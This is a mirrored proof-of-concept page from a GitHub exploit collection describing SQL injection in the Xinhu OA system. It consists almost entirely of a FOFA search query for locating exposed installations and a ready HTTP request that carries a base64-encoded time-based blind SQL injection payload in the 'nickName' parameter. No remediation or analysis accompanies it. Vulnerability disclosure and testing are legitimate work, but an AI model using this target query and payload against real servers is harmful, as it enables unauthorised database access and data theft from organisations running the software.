mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
19 lines
457 B
Markdown
19 lines
457 B
Markdown
# 信呼OA系统index存在SQL注入漏洞
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
```java
|
|
icon_hash="1652488516"
|
|
```
|
|
|
|
## poc
|
|
|
|
```java
|
|
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
|
|
```
|
|
|
|
 |